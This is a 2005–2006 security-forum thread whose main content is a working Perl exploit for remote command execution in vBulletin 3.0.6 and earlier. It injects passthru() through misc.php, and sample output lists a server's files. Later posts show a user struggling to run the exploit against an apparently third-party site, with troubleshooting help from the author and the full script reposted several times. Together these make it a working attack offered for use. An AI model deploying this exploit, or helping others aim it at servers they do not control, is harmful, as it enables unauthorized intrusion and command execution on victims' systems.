Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 29, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 730
Members: 0
Total: 730
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> vbulletin <=3.0.6 misc.php remote execution (perl)
Post new topic  Reply to topic View previous topic :: View next topic 
vbulletin <=3.0.6 misc.php remote execution (perl)
PostPosted: Tue Sep 20, 2005 3:27 pm Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




Quote:
#!/usr/bin/perl

# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)
# suBzero@kisobox.com
# Reference: http://www.securityfocus.com/bid/12622/info
#

use IO::Socket;

if (@ARGV < 3)
{
print q(
[+] vBulletin <= 3.0.6 Add templates
[+] suBzero@kisobox.com
[+] Reference: http://www.securityfocus.com/bid/12622/info
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];

$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";

$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";

print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";

$on = 0; #flag

while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";


http://kisobox.com/exploits/vbulletin306.txt
save as .pl

example exploit

C:\>perl vbulletin306.pl xxx /forums/ "ls -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to xxx/forums/
[+] Command ls -la
[+] Exploiting on progress

1000
total 1204
drwxr-xr-x 15 511 root 4096 Sep 13 15:21 .
drwxrwxr-x 54 wwwuser wwwuser 4096 Jul 18 11:18 ..
-rw------- 1 root root 23910 Sep 19 16:01 DEADJOE
drwxr-xr-x 2 root root 4096 Oct 18 2003 admin
drwxr-xr-x 3 root root 4096 Jan 20 2005 admincp
-rw-r--r-- 1 root root 6694 Jan 20 2005 announcement.php
drwxr-xr-x 2 root root 4096 Jan 20 2005 archive
-rw-r--r-- 1 root root 7394 Jan 20 2005 attachment.php
Code:
View user's profile Send private message Visit poster's website
PostPosted: Sat Feb 25, 2006 11:56 am Reply with quote
lookatmenow
Regular user
Regular user
 
Joined: Feb 24, 2006
Posts: 21




i downloaded perl, put it in c:\perl

however, when i go to properties for command prompt, i change the starting directory to c:\

which comes up as c:\> when i open it. then i type in perl after that, which gives me c:\>perl

it says ''perl is not recognised as an internal or external command, operable programme or batch file''.

i then went back to the properties of the command prompt and changed the default directory to c:\perl

and when i open command prompt i type in after c:\perl>vbulletin306.pl although this merely opens the vbulletin.pl file in to notepad.

i've tried exectuting the whole line with c:\perl>vbulletin306.pl website.com /forums/ "Is -la" then hit enter... and the same happens, just opens the .pl file in to notepad.

would like to know where i'm going wrong. cheers.
View user's profile Send private message
PostPosted: Sun Feb 26, 2006 4:37 am Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




go to any open folder >> view >> folder option and disable by clicking the extension disable.

change save file to .pl .
i guess your previous file was saved as vb306.pl.txt.
correct me if im wrong.
View user's profile Send private message Visit poster's website
PostPosted: Sun Feb 26, 2006 11:53 am Reply with quote
lookatmenow
Regular user
Regular user
 
Joined: Feb 24, 2006
Posts: 21




It's saved as vb306.pl. Although when I look at the properties, it's default program to open with is still 'notepad'. Should that be changed?
View user's profile Send private message
PostPosted: Sun Feb 26, 2006 3:39 pm Reply with quote
lookatmenow
Regular user
Regular user
 
Joined: Feb 24, 2006
Posts: 21




Quote:

c:\>perl vbulletin306.pl
Backslash found where operator expected at vbulletin306.pl line 1, near "rtf1\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansi\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansicpg
1252\"
Backslash found where operator expected at vbulletin306.pl line 1, near "deff0\"

Backslash found where operator expected at vbulletin306.pl line 1, near "f0\"
Backslash found where operator expected at vbulletin306.pl line 1, near "fswiss\
"
syntax error at vbulletin306.pl line 1, near "rtf1\"
syntax error at vbulletin306.pl line 1, near "}}"
Execution of vbulletin306.pl aborted due to compilation errors.


i've got it working now 'perl' that is. However, now there is this error that comes up. Here the script of the vbulletin306.pl file:

Quote:

{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard\f0\fs20 #!/usr/bin/perl\par
\par
# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)\par
# suBzero@kisobox.com\par
# Reference: http://www.securityfocus.com/bid/12622/info\par
#\par
\par
use IO::Socket;\par
\par
if (@ARGV < 3)\par
\{\par
print q(\par
[+] vBulletin <= 3.0.6 Add templates \par
[+] suBzero@kisobox.com\par
[+] Reference: http://www.securityfocus.com/bid/12622/info\par
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;\par
); \par
exit;\par
\}\par
\par
$serv = $ARGV[0];\par
$dir = $ARGV[1];\par
$cmd = $ARGV[2];\par
\par
$serv =~ s/(http:\\/\\/)//eg;\par
print "\\n";\par
print " [+] vBulletin 3.0.6 kisobox.com \\r\\n";\par
print " [+] Sending regard to $serv$dir \\r\\n";\par
print " [+] Command $cmd \\r\\n";\par
print " [+] Exploiting on progress \\r\\n";\par
\par
$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this\par
$byte = join('.', map \{ $_ = 'chr('.$_.')' \} unpack('C*', $cmd)); \par
$data = $dir;\par
$data .= "misc.php?do=page&template=\{\\$\{passthru($byte)\}\}";\par
\par
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\\r\\n";\par
\par
print $sock "GET $data HTTP/1.1\\n";\par
print $sock "Host: $serv\\n";\par
print $sock "Accept: */*\\n";\par
print $sock "Content-Length: ".length($data)." \\n".\par
print $sock "Connection: close\\n\\n";\par
\par
$on = 0; #flag\par
\par
while ($res = <$sock>)\par
\{\par
if ($res =~ /^_END_/) \par
\{ print "---------------------------------------------\\r\\n"; exit();\}\par
if ($on == 1) \{ print "$res"; \}\par
if ($res =~ /^_START_/) \par
\{ $on = 1; \}\par
\}\par
print "[-] Exploit failed \\r\\n";\par
print "---------------------------------------------\\r\\n";\par
}


Is the script perhaps wrong? Although it is the one from kisobox.com/exploits/vbulletin306.txt
View user's profile Send private message
PostPosted: Sun Feb 26, 2006 3:47 pm Reply with quote
lookatmenow
Regular user
Regular user
 
Joined: Feb 24, 2006
Posts: 21




o.k. Feel as though i'm getting closer. Although I now get this error:

Quote:

C:\>perl vb306.pl site.com /forum/ "Is -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forum/
[+] Command Is -la
[+] Exploiting on progress
Can't locate object method "new" via package "IO::Socket::INET" (perhaps you for
got to load "IO::Socket::INET"?) at vb306.pl line 17.

c:\>


The script I now have in the .pl file is this:

Quote:

$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];

$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";

$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";

print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";

$on = 0; #flag

while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";


Sorry about the number of posts. I'm quite the spammer Wink
View user's profile Send private message
PostPosted: Sun Feb 26, 2006 4:11 pm Reply with quote
lookatmenow
Regular user
Regular user
 
Joined: Feb 24, 2006
Posts: 21




Sorted. Wink

I used the text from your quote in that first post, and made that the 'vb306.pl' file. I finally get to the 'exploit part', however I always get 'exploit failed', without the rest of the text following:

Quote:

c:\>perl vb306.pl site.com /forums/ "Is -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forums/
[+] Command Is -la
[+] Exploiting on progress
[-] Exploit failed
---------------------------------------------

c:\>


Does this mean their forums are patched, to stop this exploit?
View user's profile Send private message
vbulletin <=3.0.6 misc.php remote execution (perl)
  www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.126 Seconds